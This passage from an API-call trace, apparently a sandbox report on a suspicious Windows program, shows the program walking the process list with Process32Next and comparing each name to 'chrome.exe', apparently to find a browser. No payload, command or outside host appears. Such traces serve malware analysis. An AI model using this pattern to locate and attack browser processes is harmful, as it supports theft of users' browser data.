cntThreads=0x84, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0182.273] lstrcmpA (lpString1="System", lpString2="chrome.exe") returned 1 [0182.273] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.273] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0182.275] lstrcmpA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0182.275] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.275] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.276] lstrcmpA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0182.276] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.276] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0182.277] lstrcmpA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0182.278] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.278] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.279] lstrcmpA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0182.279] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.279] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0182.343] lstrcmpA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0182.343] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.343] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0182.344] lstrcmpA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0182.344] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.344] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0182.345] lstrcmpA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0182.345] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.345] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.347] lstrcmpA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.347] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.347] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.348] lstrcmpA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.348] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.348] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0182.349] lstrcmpA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0182.349] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.349] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.350] lstrcmpA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.350] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.351] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.352] lstrcmpA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.352] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.352] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.353] lstrcmpA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.353] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.353] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.354] lstrcmpA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.355] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.355] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.356] lstrcmpA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.356] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.356] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.357] lstrcmpA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.357] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.357] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.513] lstrcmpA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.514] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.514] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0182.515] lstrcmpA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0182.515] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.515] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0182.517] lstrcmpA (lpString1="sihost.exe", lpString2="chrome.exe") returned 1 [0182.517] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.517] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x630, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0182.518] lstrcmpA (lpString1="RuntimeBroker.exe", lpString2="chrome.exe") returned 1 [0182.518] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.518] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x64c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.519] lstrcmpA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0182.519] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.519] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.520] lstrcmpA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.520] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.520] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0182.521] lstrcmpA (lpString1="OfficeClickToRun.exe", lpString2="chrome.exe") returned 1 [0182.522] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.522] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0182.523] lstrcmpA (lpString1="taskhostw.exe", lpString2="chrome.exe") returned 1 [0182.523] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.523] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0182.524] lstrcmpA (lpString1="SkypeHost.exe", lpString2="chrome.exe") returned 1 [0182.524] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.524] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0182.525] lstrcmpA (lpString1="ShellExperienceHost.exe", lpString2="chrome.exe") returned 1 [0182.526] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.526] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0182.527] lstrcmpA (lpString1="SearchUI.exe", lpString2="chrome.exe") returned 1 [0182.527] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.527] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.528] lstrcmpA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.528] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.529] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0182.529] lstrcmpA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0182.530] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.530] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0182.531] lstrcmpA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0182.531] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.531] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0182.532] lstrcmpA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0182.532] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.532] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0182.533] lstrcmpA (lpString1="iexplore.exe", lpString2="chrome.exe") returned 1 [0182.533] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.533] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="television-room.exe")) returned 1 [0182.534] lstrcmpA (lpString1="television-room.exe", lpString2="chrome.exe") returned 1 [0182.534] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.534] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="thought.exe")) returned 1 [0182.535] lstrcmpA (lpString1="thought.exe", lpString2="chrome.exe") returned 1 [0182.535] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.535] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="full.exe")) returned 1 [0182.537] lstrcmpA (lpString1="full.exe", lpString2="chrome.exe") returned 1 [0182.537] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.537] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-organization.exe")) returned 1 [0182.538] lstrcmpA (lpString1="travel-organization.exe", lpString2="chrome.exe") returned 1 [0182.538] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.539] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="productcasechallenge.exe")) returned 1 [0182.540] lstrcmpA (lpString1="productcasechallenge.exe", lpString2="chrome.exe") returned 1 [0182.540] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.540] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="evidence.exe")) returned 1 [0182.541] lstrcmpA (lpString1="evidence.exe", lpString2="chrome.exe") returned 1 [0182.541] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.541] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="treatment.exe")) returned 1 [0182.542] lstrcmpA (lpString1="treatment.exe", lpString2="chrome.exe") returned 1 [0182.542] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.542] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="couple-great-later.exe")) returned 1 [0182.543] lstrcmpA (lpString1="couple-great-later.exe", lpString2="chrome.exe") returned 1 [0182.543] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.545] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="tree-strategy-into.exe")) returned 1 [0182.546] lstrcmpA (lpString1="tree-strategy-into.exe", lpString2="chrome.exe") returned 1 [0182.547] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.547] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="rather_mother_federal.exe")) returned 1 [0182.548] lstrcmpA (lpString1="rather_mother_federal.exe", lpString2="chrome.exe") returned 1 [0182.548] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.548] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="partnerscene.exe")) returned 1 [0182.724] lstrcmpA (lpString1="partnerscene.exe", lpString2="chrome.exe") returned 1 [0182.725] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.725] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x284, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="color-spend-open.exe")) returned 1 [0182.726] lstrcmpA (lpString1="color-spend-open.exe", lpString2="chrome.exe") returned 1 [0182.726] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.726] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="all_center_project.exe")) returned 1 [0182.727] lstrcmpA (lpString1="all_center_project.exe", lpString2="chrome.exe") returned -1 [0182.728] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.728] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="write.exe")) returned 1 [0182.729] lstrcmpA (lpString1="write.exe", lpString2="chrome.exe") returned 1 [0182.729] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.729] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="large_n't_voice.exe")) returned 1 [0182.730] lstrcmpA (lpString1="large_n't_voice.exe", lpString2="chrome.exe") returned 1 [0182.730] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.730] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="oh_care.exe")) returned 1 [0182.731] lstrcmpA (lpString1="oh_care.exe", lpString2="chrome.exe") returned 1 [0182.732] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.732] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="but example.exe")) returned 1 [0182.732] lstrcmpA (lpString1="but example.exe", lpString2="chrome.exe") returned -1 [0182.733] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.733] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="picturesouth.exe")) returned 1 [0182.734] lstrcmpA (lpString1="picturesouth.exe", lpString2="chrome.exe") returned 1 [0182.734] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.734] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="voteapproachfly.exe")) returned 1 [0182.735] lstrcmpA (lpString1="voteapproachfly.exe", lpString2="chrome.exe") returned 1 [0182.735] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.735] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="camera_from.exe")) returned 1 [0182.736] lstrcmpA (lpString1="camera_from.exe", lpString2="chrome.exe") returned -1 [0182.736] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.736] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0182.737] lstrcmpA (lpString1="3dftp.exe", lpString2="chrome.exe") returned -1 [0182.737] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.738] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, 